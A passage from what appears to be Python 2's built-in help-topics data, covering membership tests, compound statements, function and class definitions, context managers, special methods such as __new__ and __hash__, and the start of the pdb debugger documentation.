The\ncollection membership test has traditionally been bound to sequences;\nan object is a member of a collection if the collection is a sequence\nand contains an element equal to that object. However, it makes sense\nfor many other object types to support membership tests without being\na sequence. In particular, dictionaries (for keys) and sets support\nmembership testing.\n\nFor the list and tuple types, "x in y" is true if and only if there\nexists an index *i* such that "x == y[i]" is true.\n\nFor the Unicode and string types, "x in y" is true if and only if *x*\nis a substring of *y*. An equivalent test is "y.find(x) != -1".\nNote, *x* and *y* need not be the same type; consequently, "u\'ab\' in\n\'abc\'" will return "True". Empty strings are always considered to be a\nsubstring of any other string, so """ in "abc"" will return "True".\n\nChanged in version 2.3: Previously, *x* was required to be a string of\nlength "1".\n\nFor user-defined classes which define the "__contains__()" method, "x\nin y" is true if and only if "y.__contains__(x)" is true.\n\nFor user-defined classes which do not define "__contains__()" but do\ndefine "__iter__()", "x in y" is true if some value "z" with "x == z"\nis produced while iterating over "y". If an exception is raised\nduring the iteration, it is as if "in" raised that exception.\n\nLastly, the old-style iteration protocol is tried: if a class defines\n"__getitem__()", "x in y" is true if and only if there is a non-\nnegative integer index *i* such that "x == y[i]", and all lower\ninteger indices do not raise an "IndexError" exception. (If any other\nexception is raised, it is as if "in" raised that exception).\n\nThe operator "not in" is defined to have the inverse truth value of\n"in".\n\nThe operators "is" and "is not" test for object identity: "x is y" is\ntrue if and only if *x* and *y* are the same object. "x is not y"\nyields the inverse truth value. [7]\n', 'compound': u'\nCompound statements\n*******************\n\nCompound statements contain (groups of) other statements; they affect\nor control the execution of those other statements in some way. In\ngeneral, compound statements span multiple lines, although in simple\nincarnations a whole compound statement may be contained in one line.\n\nThe "if", "while" and "for" statements implement traditional control\nflow constructs. "try" specifies exception handlers and/or cleanup\ncode for a group of statements. Function and class definitions are\nalso syntactically compound statements.\n\nCompound statements consist of one or more \'clauses.\' A clause\nconsists of a header and a \'suite.\' The clause headers of a\nparticular compound statement are all at the same indentation level.\nEach clause header begins with a uniquely identifying keyword and ends\nwith a colon. A suite is a group of statements controlled by a\nclause. A suite can be one or more semicolon-separated simple\nstatements on the same line as the header, following the header\'s\ncolon, or it can be one or more indented statements on subsequent\nlines. 
Only the latter form of suite can contain nested compound\nstatements; the following is illegal, mostly because it wouldn\'t be\nclear to which "if" clause a following "else" clause would belong:\n\n if test1: if test2: print x\n\nAlso note that the semicolon binds tighter than the colon in this\ncontext, so that in the following example, either all or none of the\n"print" statements are executed:\n\n if x < y < z: print x; print y; print z\n\nSummarizing:\n\n compound_stmt ::= if_stmt\n | while_stmt\n | for_stmt\n | try_stmt\n | with_stmt\n | funcdef\n | classdef\n | decorated\n suite ::= stmt_list NEWLINE | NEWLINE INDENT statement+ DEDENT\n statement ::= stmt_list NEWLINE | compound_stmt\n stmt_list ::= simple_stmt (";" simple_stmt)* [";"]\n\nNote that statements always end in a "NEWLINE" possibly followed by a\n"DEDENT". Also note that optional continuation clauses always begin\nwith a keyword that cannot start a statement, thus there are no\nambiguities (the \'dangling "else"\' problem is solved in Python by\nrequiring nested "if" statements to be indented).\n\nThe formatting of the grammar rules in the following sections places\neach clause on a separate line for clarity.\n\n\nThe "if" statement\n==================\n\nThe "if" statement is used for conditional execution:\n\n if_stmt ::= "if" expression ":" suite\n ( "elif" expression ":" suite )*\n ["else" ":" suite]\n\nIt selects exactly one of the suites by evaluating the expressions one\nby one until one is found to be true (see section Boolean operations\nfor the definition of true and false); then that suite is executed\n(and no other part of the "if" statement is executed or evaluated).\nIf all expressions are false, the suite of the "else" clause, if\npresent, is executed.\n\n\nThe "while" statement\n=====================\n\nThe "while" statement is used for repeated execution as long as an\nexpression is true:\n\n while_stmt ::= "while" expression ":" suite\n ["else" ":" suite]\n\nThis repeatedly tests the expression and, if it is true, executes the\nfirst suite; if the expression is false (which may be the first time\nit is tested) the suite of the "else" clause, if present, is executed\nand the loop terminates.\n\nA "break" statement executed in the first suite terminates the loop\nwithout executing the "else" clause\'s suite. A "continue" statement\nexecuted in the first suite skips the rest of the suite and goes back\nto testing the expression.\n\n\nThe "for" statement\n===================\n\nThe "for" statement is used to iterate over the elements of a sequence\n(such as a string, tuple or list) or other iterable object:\n\n for_stmt ::= "for" target_list "in" expression_list ":" suite\n ["else" ":" suite]\n\nThe expression list is evaluated once; it should yield an iterable\nobject. An iterator is created for the result of the\n"expression_list". The suite is then executed once for each item\nprovided by the iterator, in the order of ascending indices. Each\nitem in turn is assigned to the target list using the standard rules\nfor assignments, and then the suite is executed. When the items are\nexhausted (which is immediately when the sequence is empty), the suite\nin the "else" clause, if present, is executed, and the loop\nterminates.\n\nA "break" statement executed in the first suite terminates the loop\nwithout executing the "else" clause\'s suite. 
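For example (an\nillustrative search loop):\n\n >>> for n in [1, 3, 5]:\n ...     if n % 2 == 0:\n ...         print \'found\', n\n ...         break\n ... else:\n ...     print \'no even number\'\n ...\n no even number\n\n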
A "continue" statement\nexecuted in the first suite skips the rest of the suite and continues\nwith the next item, or with the "else" clause if there was no next\nitem.\n\nThe suite may assign to the variable(s) in the target list; this does\nnot affect the next item assigned to it.\n\nThe target list is not deleted when the loop is finished, but if the\nsequence is empty, it will not have been assigned to at all by the\nloop. Hint: the built-in function "range()" returns a sequence of\nintegers suitable to emulate the effect of Pascal\'s "for i := a to b\ndo"; e.g., "range(3)" returns the list "[0, 1, 2]".\n\nNote: There is a subtlety when the sequence is being modified by the\n loop (this can only occur for mutable sequences, i.e. lists). An\n internal counter is used to keep track of which item is used next,\n and this is incremented on each iteration. When this counter has\n reached the length of the sequence the loop terminates. This means\n that if the suite deletes the current (or a previous) item from the\n sequence, the next item will be skipped (since it gets the index of\n the current item which has already been treated). Likewise, if the\n suite inserts an item in the sequence before the current item, the\n current item will be treated again the next time through the loop.\n This can lead to nasty bugs that can be avoided by making a\n temporary copy using a slice of the whole sequence, e.g.,\n\n for x in a[:]:\n if x < 0: a.remove(x)\n\n\nThe "try" statement\n===================\n\nThe "try" statement specifies exception handlers and/or cleanup code\nfor a group of statements:\n\n try_stmt ::= try1_stmt | try2_stmt\n try1_stmt ::= "try" ":" suite\n ("except" [expression [("as" | ",") identifier]] ":" suite)+\n ["else" ":" suite]\n ["finally" ":" suite]\n try2_stmt ::= "try" ":" suite\n "finally" ":" suite\n\nChanged in version 2.5: In previous versions of Python,\n"try"..."except"..."finally" did not work. "try"..."except" had to be\nnested in "try"..."finally".\n\nThe "except" clause(s) specify one or more exception handlers. When no\nexception occurs in the "try" clause, no exception handler is\nexecuted. When an exception occurs in the "try" suite, a search for an\nexception handler is started. This search inspects the except clauses\nin turn until one is found that matches the exception. An expression-\nless except clause, if present, must be last; it matches any\nexception. For an except clause with an expression, that expression\nis evaluated, and the clause matches the exception if the resulting\nobject is "compatible" with the exception. An object is compatible\nwith an exception if it is the class or a base class of the exception\nobject, or a tuple containing an item compatible with the exception.\n\nIf no except clause matches the exception, the search for an exception\nhandler continues in the surrounding code and on the invocation stack.\n[1]\n\nIf the evaluation of an expression in the header of an except clause\nraises an exception, the original search for a handler is canceled and\na search starts for the new exception in the surrounding code and on\nthe call stack (it is treated as if the entire "try" statement raised\nthe exception).\n\nWhen a matching except clause is found, the exception is assigned to\nthe target specified in that except clause, if present, and the except\nclause\'s suite is executed. All except clauses must have an\nexecutable block. When the end of this block is reached, execution\ncontinues normally after the entire try statement. 
(This means that\nif two nested handlers exist for the same exception, and the exception\noccurs in the try clause of the inner handler, the outer handler will\nnot handle the exception.)\n\nBefore an except clause\'s suite is executed, details about the\nexception are assigned to three variables in the "sys" module:\n"sys.exc_type" receives the object identifying the exception;\n"sys.exc_value" receives the exception\'s parameter;\n"sys.exc_traceback" receives a traceback object (see section The\nstandard type hierarchy) identifying the point in the program where\nthe exception occurred. These details are also available through the\n"sys.exc_info()" function, which returns a tuple "(exc_type,\nexc_value, exc_traceback)". Use of the corresponding variables is\ndeprecated in favor of this function, since their use is unsafe in a\nthreaded program. As of Python 1.5, the variables are restored to\ntheir previous values (before the call) when returning from a function\nthat handled an exception.\n\nThe optional "else" clause is executed if and when control flows off\nthe end of the "try" clause. [2] Exceptions in the "else" clause are\nnot handled by the preceding "except" clauses.\n\nIf "finally" is present, it specifies a \'cleanup\' handler. The "try"\nclause is executed, including any "except" and "else" clauses. If an\nexception occurs in any of the clauses and is not handled, the\nexception is temporarily saved. The "finally" clause is executed. If\nthere is a saved exception, it is re-raised at the end of the\n"finally" clause. If the "finally" clause raises another exception or\nexecutes a "return" or "break" statement, the saved exception is\ndiscarded:\n\n >>> def f():\n ... try:\n ... 1/0\n ... finally:\n ... return 42\n ...\n >>> f()\n 42\n\nThe exception information is not available to the program during\nexecution of the "finally" clause.\n\nWhen a "return", "break" or "continue" statement is executed in the\n"try" suite of a "try"..."finally" statement, the "finally" clause is\nalso executed \'on the way out.\' A "continue" statement is illegal in\nthe "finally" clause. (The reason is a problem with the current\nimplementation --- this restriction may be lifted in the future).\n\nThe return value of a function is determined by the last "return"\nstatement executed. Since the "finally" clause always executes, a\n"return" statement executed in the "finally" clause will always be the\nlast one executed:\n\n >>> def foo():\n ... try:\n ... return \'try\'\n ... finally:\n ... return \'finally\'\n ...\n >>> foo()\n \'finally\'\n\nAdditional information on exceptions can be found in section\nExceptions, and information on using the "raise" statement to generate\nexceptions may be found in section The raise statement.\n\n\nThe "with" statement\n====================\n\nNew in version 2.5.\n\nThe "with" statement is used to wrap the execution of a block with\nmethods defined by a context manager (see section With Statement\nContext Managers). This allows common "try"..."except"..."finally"\nusage patterns to be encapsulated for convenient reuse.\n\n with_stmt ::= "with" with_item ("," with_item)* ":" suite\n with_item ::= expression ["as" target]\n\nThe execution of the "with" statement with one "item" proceeds as\nfollows:\n\n1. The context expression (the expression given in the "with_item")\n is evaluated to obtain a context manager.\n\n2. The context manager\'s "__exit__()" is loaded for later use.\n\n3. The context manager\'s "__enter__()" method is invoked.\n\n4. 
If a target was included in the "with" statement, the return\n value from "__enter__()" is assigned to it.\n\n Note: The "with" statement guarantees that if the "__enter__()"\n method returns without an error, then "__exit__()" will always be\n called. Thus, if an error occurs during the assignment to the\n target list, it will be treated the same as an error occurring\n within the suite would be. See step 6 below.\n\n5. The suite is executed.\n\n6. The context manager\'s "__exit__()" method is invoked. If an\n exception caused the suite to be exited, its type, value, and\n traceback are passed as arguments to "__exit__()". Otherwise, three\n "None" arguments are supplied.\n\n If the suite was exited due to an exception, and the return value\n from the "__exit__()" method was false, the exception is reraised.\n If the return value was true, the exception is suppressed, and\n execution continues with the statement following the "with"\n statement.\n\n If the suite was exited for any reason other than an exception, the\n return value from "__exit__()" is ignored, and execution proceeds\n at the normal location for the kind of exit that was taken.\n\nWith more than one item, the context managers are processed as if\nmultiple "with" statements were nested:\n\n with A() as a, B() as b:\n suite\n\nis equivalent to\n\n with A() as a:\n with B() as b:\n suite\n\nNote: In Python 2.5, the "with" statement is only allowed when the\n "with_statement" feature has been enabled. It is always enabled in\n Python 2.6.\n\nChanged in version 2.7: Support for multiple context expressions.\n\nSee also:\n\n **PEP 0343** - The "with" statement\n The specification, background, and examples for the Python "with"\n statement.\n\n\nFunction definitions\n====================\n\nA function definition defines a user-defined function object (see\nsection The standard type hierarchy):\n\n decorated ::= decorators (classdef | funcdef)\n decorators ::= decorator+\n decorator ::= "@" dotted_name ["(" [argument_list [","]] ")"] NEWLINE\n funcdef ::= "def" funcname "(" [parameter_list] ")" ":" suite\n dotted_name ::= identifier ("." identifier)*\n parameter_list ::= (defparameter ",")*\n ( "*" identifier ["," "**" identifier]\n | "**" identifier\n | defparameter [","] )\n defparameter ::= parameter ["=" expression]\n sublist ::= parameter ("," parameter)* [","]\n parameter ::= identifier | "(" sublist ")"\n funcname ::= identifier\n\nA function definition is an executable statement. Its execution binds\nthe function name in the current local namespace to a function object\n(a wrapper around the executable code for the function). This\nfunction object contains a reference to the current global namespace\nas the global namespace to be used when the function is called.\n\nThe function definition does not execute the function body; this gets\nexecuted only when the function is called. [3]\n\nA function definition may be wrapped by one or more *decorator*\nexpressions. Decorator expressions are evaluated when the function is\ndefined, in the scope that contains the function definition. The\nresult must be a callable, which is invoked with the function object\nas the only argument. The returned value is bound to the function name\ninstead of the function object. Multiple decorators are applied in\nnested fashion. 
For example, the following code:\n\n @f1(arg)\n @f2\n def func(): pass\n\nis equivalent to:\n\n def func(): pass\n func = f1(arg)(f2(func))\n\nWhen one or more top-level *parameters* have the form *parameter* "="\n*expression*, the function is said to have "default parameter values."\nFor a parameter with a default value, the corresponding *argument* may\nbe omitted from a call, in which case the parameter\'s default value is\nsubstituted. If a parameter has a default value, all following\nparameters must also have a default value --- this is a syntactic\nrestriction that is not expressed by the grammar.\n\n**Default parameter values are evaluated when the function definition\nis executed.** This means that the expression is evaluated once, when\nthe function is defined, and that the same "pre-computed" value is\nused for each call. This is especially important to understand when a\ndefault parameter is a mutable object, such as a list or a dictionary:\nif the function modifies the object (e.g. by appending an item to a\nlist), the default value is in effect modified. This is generally not\nwhat was intended. A way around this is to use "None" as the\ndefault, and explicitly test for it in the body of the function, e.g.:\n\n def whats_on_the_telly(penguin=None):\n if penguin is None:\n penguin = []\n penguin.append("property of the zoo")\n return penguin\n\nFunction call semantics are described in more detail in section Calls.\nA function call always assigns values to all parameters mentioned in\nthe parameter list, either from positional arguments, from keyword\narguments, or from default values. If the form ""*identifier"" is\npresent, it is initialized to a tuple receiving any excess positional\nparameters, defaulting to the empty tuple. If the form\n""**identifier"" is present, it is initialized to a new dictionary\nreceiving any excess keyword arguments, defaulting to a new empty\ndictionary.\n\nIt is also possible to create anonymous functions (functions not bound\nto a name), for immediate use in expressions. This uses lambda\nexpressions, described in section Lambdas. Note that the lambda\nexpression is merely a shorthand for a simplified function definition;\na function defined in a ""def"" statement can be passed around or\nassigned to another name just like a function defined by a lambda\nexpression. The ""def"" form is actually more powerful since it\nallows the execution of multiple statements.\n\n**Programmer\'s note:** Functions are first-class objects. A ""def""\nform executed inside a function definition defines a local function\nthat can be returned or passed around. Free variables used in the\nnested function can access the local variables of the function\ncontaining the def. See section Naming and binding for details.\n\n\nClass definitions\n=================\n\nA class definition defines a class object (see section The standard\ntype hierarchy):\n\n classdef ::= "class" classname [inheritance] ":" suite\n inheritance ::= "(" [expression_list] ")"\n classname ::= identifier\n\nA class definition is an executable statement. It first evaluates the\ninheritance list, if present. Each item in the inheritance list\nshould evaluate to a class object or class type which allows\nsubclassing. The class\'s suite is then executed in a new execution\nframe (see section Naming and binding), using a newly created local\nnamespace and the original global namespace. (Usually, the suite\ncontains only function definitions.) 
When the class\'s suite finishes\nexecution, its execution frame is discarded but its local namespace is\nsaved. [4] A class object is then created using the inheritance list\nfor the base classes and the saved local namespace for the attribute\ndictionary. The class name is bound to this class object in the\noriginal local namespace.\n\n**Programmer\'s note:** Variables defined in the class definition are\nclass variables; they are shared by all instances. To create instance\nvariables, they can be set in a method with "self.name = value". Both\nclass and instance variables are accessible through the notation\n""self.name"", and an instance variable hides a class variable with\nthe same name when accessed in this way. Class variables can be used\nas defaults for instance variables, but using mutable values there can\nlead to unexpected results. For *new-style class*es, descriptors can\nbe used to create instance variables with different implementation\ndetails.\n\nClass definitions, like function definitions, may be wrapped by one or\nmore *decorator* expressions. The evaluation rules for the decorator\nexpressions are the same as for functions. The result must be a class\nobject, which is then bound to the class name.\n\n-[ Footnotes ]-\n\n[1] The exception is propagated to the invocation stack unless\n there is a "finally" clause which happens to raise another\n exception. That new exception causes the old one to be lost.\n\n[2] Currently, control "flows off the end" except in the case of\n an exception or the execution of a "return", "continue", or\n "break" statement.\n\n[3] A string literal appearing as the first statement in the\n function body is transformed into the function\'s "__doc__"\n attribute and therefore the function\'s *docstring*.\n\n[4] A string literal appearing as the first statement in the class\n body is transformed into the namespace\'s "__doc__" item and\n therefore the class\'s *docstring*.\n', 'context-managers': u'\nWith Statement Context Managers\n*******************************\n\nNew in version 2.5.\n\nA *context manager* is an object that defines the runtime context to\nbe established when executing a "with" statement. The context manager\nhandles the entry into, and the exit from, the desired runtime context\nfor the execution of the block of code. Context managers are normally\ninvoked using the "with" statement (described in section The with\nstatement), but can also be used by directly invoking their methods.\n\nTypical uses of context managers include saving and restoring various\nkinds of global state, locking and unlocking resources, closing opened\nfiles, etc.\n\nFor more information on context managers, see Context Manager Types.\n\nobject.__enter__(self)\n\n Enter the runtime context related to this object. The "with"\n statement will bind this method\'s return value to the target(s)\n specified in the "as" clause of the statement, if any.\n\nobject.__exit__(self, exc_type, exc_value, traceback)\n\n Exit the runtime context related to this object. The parameters\n describe the exception that caused the context to be exited. If the\n context was exited without an exception, all three arguments will\n be "None".\n\n If an exception is supplied, and the method wishes to suppress the\n exception (i.e., prevent it from being propagated), it should\n return a true value. 
Otherwise, the exception will be processed\n normally upon exit from this method.\n\n Note that "__exit__()" methods should not reraise the passed-in\n exception; this is the caller\'s responsibility.\n\nSee also:\n\n **PEP 0343** - The "with" statement\n The specification, background, and examples for the Python "with"\n statement.\n', 'continue': u'\nThe "continue" statement\n************************\n\n continue_stmt ::= "continue"\n\n"continue" may only occur syntactically nested in a "for" or "while"\nloop, but not nested in a function or class definition or "finally"\nclause within that loop. It continues with the next cycle of the\nnearest enclosing loop.\n\nWhen "continue" passes control out of a "try" statement with a\n"finally" clause, that "finally" clause is executed before really\nstarting the next loop cycle.\n', 'conversions': u'\nArithmetic conversions\n**********************\n\nWhen a description of an arithmetic operator below uses the phrase\n"the numeric arguments are converted to a common type," the arguments\nare coerced using the coercion rules listed at Coercion rules. If\nboth arguments are standard numeric types, the following coercions are\napplied:\n\n* If either argument is a complex number, the other is converted to\n complex;\n\n* otherwise, if either argument is a floating point number, the\n other is converted to floating point;\n\n* otherwise, if either argument is a long integer, the other is\n converted to long integer;\n\n* otherwise, both must be plain integers and no conversion is\n necessary.\n\nSome additional rules apply for certain operators (e.g., a string left\nargument to the \'%\' operator). Extensions can define their own\ncoercions.\n', 'customization': u'\nBasic customization\n*******************\n\nobject.__new__(cls[, ...])\n\n Called to create a new instance of class *cls*. "__new__()" is a\n static method (special-cased so you need not declare it as such)\n that takes the class of which an instance was requested as its\n first argument. The remaining arguments are those passed to the\n object constructor expression (the call to the class). The return\n value of "__new__()" should be the new object instance (usually an\n instance of *cls*).\n\n Typical implementations create a new instance of the class by\n invoking the superclass\'s "__new__()" method using\n "super(currentclass, cls).__new__(cls[, ...])" with appropriate\n arguments and then modifying the newly-created instance as\n necessary before returning it.\n\n If "__new__()" returns an instance of *cls*, then the new\n instance\'s "__init__()" method will be invoked like\n "__init__(self[, ...])", where *self* is the new instance and the\n remaining arguments are the same as were passed to "__new__()".\n\n If "__new__()" does not return an instance of *cls*, then the new\n instance\'s "__init__()" method will not be invoked.\n\n "__new__()" is intended mainly to allow subclasses of immutable\n types (like int, str, or tuple) to customize instance creation. It\n is also commonly overridden in custom metaclasses in order to\n customize class creation.\n\nobject.__init__(self[, ...])\n\n Called after the instance has been created (by "__new__()"), but\n before it is returned to the caller. The arguments are those\n passed to the class constructor expression. 
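A minimal sketch of the two hooks cooperating (the class name and the\nprinted messages are illustrative only):\n\n   class Point(object):\n       def __new__(cls, *args):\n           print \'creating\', cls.__name__\n           return super(Point, cls).__new__(cls)\n       def __init__(self, x, y):\n           print \'initialising\'\n           self.x, self.y = x, y\n\n   p = Point(1, 2)            # prints "creating Point", then "initialising"\n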
If a base class has an\n "__init__()" method, the derived class\'s "__init__()" method, if\n any, must explicitly call it to ensure proper initialization of the\n base class part of the instance; for example:\n "BaseClass.__init__(self, [args...])".\n\n Because "__new__()" and "__init__()" work together in constructing\n objects ("__new__()" to create it, and "__init__()" to customise\n it), no non-"None" value may be returned by "__init__()"; doing so\n will cause a "TypeError" to be raised at runtime.\n\nobject.__del__(self)\n\n Called when the instance is about to be destroyed. This is also\n called a destructor. If a base class has a "__del__()" method, the\n derived class\'s "__del__()" method, if any, must explicitly call it\n to ensure proper deletion of the base class part of the instance.\n Note that it is possible (though not recommended!) for the\n "__del__()" method to postpone destruction of the instance by\n creating a new reference to it. It may then be called at a later\n time when this new reference is deleted. It is not guaranteed that\n "__del__()" methods are called for objects that still exist when\n the interpreter exits.\n\n Note: "del x" doesn\'t directly call "x.__del__()" --- the former\n decrements the reference count for "x" by one, and the latter is\n only called when "x"\'s reference count reaches zero. Some common\n situations that may prevent the reference count of an object from\n going to zero include: circular references between objects (e.g.,\n a doubly-linked list or a tree data structure with parent and\n child pointers); a reference to the object on the stack frame of\n a function that caught an exception (the traceback stored in\n "sys.exc_traceback" keeps the stack frame alive); or a reference\n to the object on the stack frame that raised an unhandled\n exception in interactive mode (the traceback stored in\n "sys.last_traceback" keeps the stack frame alive). The first\n situation can only be remedied by explicitly breaking the cycles;\n the latter two situations can be resolved by storing "None" in\n "sys.exc_traceback" or "sys.last_traceback". Circular references\n which are garbage are detected when the optional cycle detector is\n enabled (it\'s on by default), but can only be cleaned up if there\n are no Python-level "__del__()" methods involved. Refer to the\n documentation for the "gc" module for more information about how\n "__del__()" methods are handled by the cycle detector,\n particularly the description of the "garbage" value.\n\n Warning: Due to the precarious circumstances under which\n "__del__()" methods are invoked, exceptions that occur during\n their execution are ignored, and a warning is printed to\n "sys.stderr" instead. Also, when "__del__()" is invoked in\n response to a module being deleted (e.g., when execution of the\n program is done), other globals referenced by the "__del__()"\n method may already have been deleted or be in the process of\n being torn down (e.g. the import machinery shutting down). For\n this reason, "__del__()" methods should do the absolute minimum\n needed to maintain external invariants. 
Starting with version 1.5,\n Python guarantees that globals whose name begins with a single\n underscore are deleted from their module before other globals are\n deleted; if no other references to such globals exist, this may\n help in assuring that imported modules are still available at the\n time when the "__del__()" method is called.\n\n See also the "-R" command-line option.\n\nobject.__repr__(self)\n\n Called by the "repr()" built-in function and by string conversions\n (reverse quotes) to compute the "official" string representation of\n an object. If at all possible, this should look like a valid\n Python expression that could be used to recreate an object with the\n same value (given an appropriate environment). If this is not\n possible, a string of the form "<...some useful description...>"\n should be returned. The return value must be a string object. If a\n class defines "__repr__()" but not "__str__()", then "__repr__()"\n is also used when an "informal" string representation of instances\n of that class is required.\n\n This is typically used for debugging, so it is important that the\n representation is information-rich and unambiguous.\n\nobject.__str__(self)\n\n Called by the "str()" built-in function and by the "print"\n statement to compute the "informal" string representation of an\n object. This differs from "__repr__()" in that it does not have to\n be a valid Python expression: a more convenient or concise\n representation may be used instead. The return value must be a\n string object.\n\nobject.__lt__(self, other)\nobject.__le__(self, other)\nobject.__eq__(self, other)\nobject.__ne__(self, other)\nobject.__gt__(self, other)\nobject.__ge__(self, other)\n\n New in version 2.1.\n\n These are the so-called "rich comparison" methods, and are called\n for comparison operators in preference to "__cmp__()" below. The\n correspondence between operator symbols and method names is as\n follows: "x<y" calls "x.__lt__(y)", "x<=y" calls "x.__le__(y)",\n "x==y" calls "x.__eq__(y)", "x!=y" and "x<>y" call "x.__ne__(y)",\n "x>y" calls "x.__gt__(y)", and "x>=y" calls "x.__ge__(y)".\n\n A rich comparison method may return the singleton "NotImplemented"\n if it does not implement the operation for a given pair of\n arguments. By convention, "False" and "True" are returned for a\n successful comparison. However, these methods can return any value,\n so if the comparison operator is used in a Boolean context (e.g.,\n in the condition of an "if" statement), Python will call "bool()"\n on the value to determine if the result is true or false.\n\n There are no implied relationships among the comparison operators.\n The truth of "x==y" does not imply that "x!=y" is false.\n Accordingly, when defining "__eq__()", one should also define\n "__ne__()" so that the operators will behave as expected. 
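For example, an equality pair that delegates "__ne__()" to\n"__eq__()" might look like this (the class is illustrative only):\n\n   class Account(object):\n       def __init__(self, number):\n           self.number = number\n       def __eq__(self, other):\n           if not isinstance(other, Account):\n               return NotImplemented\n           return self.number == other.number\n       def __ne__(self, other):\n           result = self.__eq__(other)\n           if result is NotImplemented:\n               return result              # let the other operand try\n           return not result\n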
See the\n paragraph on "__hash__()" for some important notes on creating\n *hashable* objects which support custom comparison operations and\n are usable as dictionary keys.\n\n There are no swapped-argument versions of these methods (to be used\n when the left argument does not support the operation but the right\n argument does); rather, "__lt__()" and "__gt__()" are each other\'s\n reflection, "__le__()" and "__ge__()" are each other\'s reflection,\n and "__eq__()" and "__ne__()" are their own reflection.\n\n Arguments to rich comparison methods are never coerced.\n\n To automatically generate ordering operations from a single root\n operation, see "functools.total_ordering()".\n\nobject.__cmp__(self, other)\n\n Called by comparison operations if rich comparison (see above) is\n not defined. Should return a negative integer if "self < other",\n zero if "self == other", a positive integer if "self > other". If\n no "__cmp__()", "__eq__()" or "__ne__()" operation is defined,\n class instances are compared by object identity ("address"). See\n also the description of "__hash__()" for some important notes on\n creating *hashable* objects which support custom comparison\n operations and are usable as dictionary keys. (Note: the\n restriction that exceptions are not propagated by "__cmp__()" has\n been removed since Python 1.5.)\n\nobject.__rcmp__(self, other)\n\n Changed in version 2.1: No longer supported.\n\nobject.__hash__(self)\n\n Called by built-in function "hash()" and for operations on members\n of hashed collections including "set", "frozenset", and "dict".\n "__hash__()" should return an integer. The only required property\n is that objects which compare equal have the same hash value; it is\n advised to somehow mix together (e.g. using exclusive or) the hash\n values for the components of the object that also play a part in\n comparison of objects.\n\n If a class does not define a "__cmp__()" or "__eq__()" method it\n should not define a "__hash__()" operation either; if it defines\n "__cmp__()" or "__eq__()" but not "__hash__()", its instances will\n not be usable in hashed collections. If a class defines mutable\n objects and implements a "__cmp__()" or "__eq__()" method, it\n should not implement "__hash__()", since hashable collection\n implementations require that an object\'s hash value is immutable\n (if the object\'s hash value changes, it will be in the wrong hash\n bucket).\n\n User-defined classes have "__cmp__()" and "__hash__()" methods by\n default; with them, all objects compare unequal (except with\n themselves) and "x.__hash__()" returns a result derived from\n "id(x)".\n\n Classes which inherit a "__hash__()" method from a parent class but\n change the meaning of "__cmp__()" or "__eq__()" such that the hash\n value returned is no longer appropriate (e.g. by switching to a\n value-based concept of equality instead of the default identity\n based equality) can explicitly flag themselves as being unhashable\n by setting "__hash__ = None" in the class definition. 
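A short sketch of that idiom (the class names are illustrative only):\n\n   class Tag(object):                     # hashable, identity-based equality\n       pass\n\n   class ValueTag(Tag):\n       def __eq__(self, other):           # switches to value-based equality\n           return isinstance(other, ValueTag) and vars(self) == vars(other)\n       __hash__ = None                    # opt out of the inherited hash\n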
Doing so\n means that not only will instances of the class raise an\n appropriate "TypeError" when a program attempts to retrieve their\n hash value, but they will also be correctly identified as\n unhashable when checking "isinstance(obj, collections.Hashable)"\n (unlike classes which define their own "__hash__()" to explicitly\n raise "TypeError").\n\n Changed in version 2.5: "__hash__()" may now also return a long\n integer object; the 32-bit integer is then derived from the hash of\n that object.\n\n Changed in version 2.6: "__hash__" may now be set to "None" to\n explicitly flag instances of a class as unhashable.\n\nobject.__nonzero__(self)\n\n Called to implement truth value testing and the built-in operation\n "bool()"; should return "False" or "True", or their integer\n equivalents "0" or "1". When this method is not defined,\n "__len__()" is called, if it is defined, and the object is\n considered true if its result is nonzero. If a class defines\n neither "__len__()" nor "__nonzero__()", all its instances are\n considered true.\n\nobject.__unicode__(self)\n\n Called to implement "unicode()" built-in; should return a Unicode\n object. When this method is not defined, string conversion is\n attempted, and the result of string conversion is converted to\n Unicode using the system default encoding.\n', 'debugger': u'\n"pdb" --- The Python Debugger\n*****************************\n\n**Source code:** Lib/pdb.py\n\n======================================================================\n\nThe module "pdb" defines an interactive source code debugger for\nPython programs. It supports setting (conditional) breakpoints and\nsingle stepping at the source line level, inspection of stack frames,\nsource code listing, and evaluation of arbitrary Python code in the\ncontext of any stack frame. It also supports post-mortem debugging\nand can be called under program control.\n\nThe debugger is extensible --- it is actually defined as the class\n"Pdb". This is currently undocumented but easily understood by reading\nthe source. The extension interface uses the modules "bdb" and "cmd".\n\nThe debugger\'s prompt is "(Pdb)". Typical usage to run a program under\ncontrol of the debugger is:\n\n >>> import pdb\n >>> import mymodule\n >>> pdb.run(\'mymodule.test()\')\n > <string>(0)?()\n (Pdb) continue\n > <string>(1)?()\n (Pdb) continue\n NameError: \'spam\'\n > <string>(1)?()\n (Pdb)\n\n"pdb.py" can also be invoked as a script to debug other scripts. For\nexample:\n\n python -m pdb myscript.py\n\nWhen invoked as a script, pdb will automatically enter post-mortem\ndebugging if the program being debugged exits abnormally. After post-\nmortem debugging (or after normal exit of the program), pdb will\nrestart the program. Automatic restarting preserves pdb\'s state (such\nas breakpoints) and in most cases is more useful than quitting the\ndebugger upon program\'s exit.\n\nNew in version 2.4: Restarting post-mortem behavior added.\n\nThe typical usage to break into the debugger from a running program is\nto insert\n\n import pdb; pdb.set_trace()\n\nat the location you want to break into the debugger. 
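For example (the function is illustrative only):\n\n   def divide(a, b):\n       import pdb; pdb.set_trace()        # execution pauses here\n       return a / b\n\n   divide(10, 0)                          # enters the (Pdb) prompt first\n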
You can then\nstep through the code following this statement, and continue running\nwithout the debugger using the "c" command.\n\nThe typical usage to inspect a crashed program is:\n\n >>> import pdb\n >>> import mymodule\n >>> mymodule.test()\n Traceback (most recent call last):\n File "<stdin>", line 1, in ?\n File "./mymodule.py", line 4, in test\n test2()\n File "./mymodule.py", line 3, in test2\n print spam\n NameError: spam\n >>> pdb.pm()\n > ./mymodule.py(3)test2()\n -> print spam\n (Pdb)\n\nThe module defines the following functions; each enters the debugger\nin a slightly different way:\n\npdb.run(statement[, globals[, locals]])\n\n Execute the *statement* (given as a string) under debugger control.\n The debugger prompt appears before any code is executed; you can\n set breakpoints and type "continue", or you can step through the\n statement using "step" or "next" (all these commands are explained\n below). The optional *globals* and *locals* arguments specify the\n environment in which the code is executed; by default the\n dictionary of the module "__main__" is used. (See the explanation\n of the "exec" statement or the "eval()" built-in function.)\n\npdb.runeval(expression[, globals[, locals]])\n\n Evaluate the *expression* (given as a string) under debugger\n control. When "runeval()" returns, it returns the value of the\n expression. Otherwise this function is similar to "run()".\n\npdb.runcall(function[, argument, ...])\n\n Call the *function* (a function or method object, not a string)\n with the given 